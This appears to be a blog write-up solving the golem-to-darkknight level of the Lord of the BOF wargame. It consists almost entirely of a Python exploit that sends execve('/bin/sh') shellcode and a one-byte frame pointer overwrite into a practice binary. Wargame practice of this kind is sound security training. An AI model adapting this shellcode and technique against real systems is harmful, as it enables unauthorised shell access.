exploit.py
import os
from struct import *
p = lambda x : pack("<L" , x)
path = '/home/golem/darkknight'
shellAddress = p(0xbffffa98)
FPO_Byte = "\x90"
payload = shellAddress+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"A"*11+FPO_Byte
os.execl(path,path,payload)
'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글
[Remind] LOB bugbear -> giant (0) | 2019.04.18 |
---|---|
[Remind] LOB darkknight -> bugbear (0) | 2019.04.16 |
[Remind] LOB skeleton -> golem (0) | 2019.04.16 |
[Remind] LOB vampire -> skeleton (0) | 2019.04.16 |
[Remind] LOB troll -> vampire (0) | 2019.04.16 |